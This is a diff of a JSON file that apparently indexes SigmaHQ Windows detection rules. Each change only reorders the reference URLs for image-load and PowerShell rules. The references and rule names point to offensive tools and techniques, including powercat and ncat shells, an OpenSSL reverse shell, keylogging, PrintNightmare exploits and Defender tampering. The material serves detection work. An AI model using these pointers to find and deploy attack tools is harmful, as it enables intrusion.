- "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
 "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html",
 "https://twitter.com/dez_/status/986614411711442944",
+ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"
 ],
 "tags": [
@@ -19914,8 +19938,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/binderlabs/DirCreate2System",
 "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt",
+ "https://github.com/binderlabs/DirCreate2System",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml"
 ],
 "tags": [
@@ -19942,10 +19966,10 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture",
- "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
 "https://github.com/bohops/WSMan-WinRM",
 "https://twitter.com/chadtilbury/status/1275851297770610688",
+ "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
+ "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml"
 ],
 "tags": [
@@ -20020,8 +20044,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/am0nsec/status/1412232114980982787",
 "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add",
+ "https://twitter.com/am0nsec/status/1412232114980982787",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml"
 ],
 "tags": [
@@ -20347,12 +20371,12 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
- "https://github.com/Wh04m1001/SysmonEoP",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
- "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
- "https://decoded.avast.io/martinchlumecky/png-steganography/",
 "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
+ "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
+ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
+ "https://decoded.avast.io/martinchlumecky/png-steganography/",
+ "https://github.com/Wh04m1001/SysmonEoP",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml"
 ],
 "tags": [
@@ -20467,8 +20491,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp",
 "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
+ "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml"
 ],
 "tags": [
@@ -20528,8 +20552,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" ], "tags": [ @@ -20555,8 +20579,8 @@ "refs": [ "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://hijacklibs.net/", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ @@ -20800,10 +20824,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/tyranid/DotNetToJScript", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://thewover.github.io/Introducing-Donut/", + "https://github.com/tyranid/DotNetToJScript", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], "tags": [ 
@@ -20887,8 +20911,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", + "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" ], "tags": [ @@ -21268,9 +21292,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", - "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" ], "tags": [ @@ -21425,8 +21449,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/ly4k/SpoolFool", "https://github.com/hhlxf/PrintNightmare", + "https://github.com/ly4k/SpoolFool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" ], "tags": [ 
@@ -21490,9 +21514,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" ], "tags": [ @@ -21660,8 +21684,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/RiccardoAncarani/LiquidSnake", - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ @@ -21695,8 +21719,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ 
@@ -21729,9 +21753,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ @@ -21882,8 +21906,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -21985,8 +22009,8 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" ], "tags": [ 
@@ -22278,9 +22302,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://www.mdeditor.tw/pl/pgRt", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://www.mdeditor.tw/pl/pgRt", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ @@ -22313,8 +22337,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" ], "tags": [ @@ -22508,8 +22532,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" ], "tags": [ 
@@ -22543,8 +22567,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" ], "tags": [ @@ -23059,8 +23083,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" ], "tags": [ @@ -23084,8 +23108,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ 
@@ -23285,8 +23309,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/datasources/DS0005/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" ], "tags": [ @@ -23454,8 +23478,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" ], "tags": [ @@ -23613,8 +23637,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://techgenix.com/malicious-powershell-scripts-evade-detection/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", + "https://techgenix.com/malicious-powershell-scripts-evade-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" ], "tags": [ 
@@ -23717,10 +23741,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://adsecurity.org/?p=2277", "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://adsecurity.org/?p=2277", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ @@ -23862,8 +23886,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], 
@@ -23897,9 +23921,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -23924,8 +23948,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ 
@@ -24073,10 +24097,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "http://woshub.com/manage-windows-firewall-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], @@ -24110,8 +24134,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ 
@@ -24177,8 +24201,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" ], "tags": [ @@ -24235,10 +24259,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -24351,8 +24375,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", + "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" ], "tags": [ 
@@ -24507,9 +24531,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -24566,8 +24590,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ 
@@ -24965,8 +24989,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" ], "tags": [ @@ -25226,8 +25250,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ @@ -25261,8 +25285,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" ], "tags": [ 
@@ -25423,8 +25447,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ @@ -25480,9 +25504,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" ], "tags": [ 
@@ -25810,8 +25834,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" ], "tags": [ @@ -25911,8 +25935,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ 
@@ -25945,8 +25969,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" ], "tags": [ @@ -25970,8 +25994,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/datasources/DS0005/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ @@ -26004,8 +26028,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" ], "tags": [ 
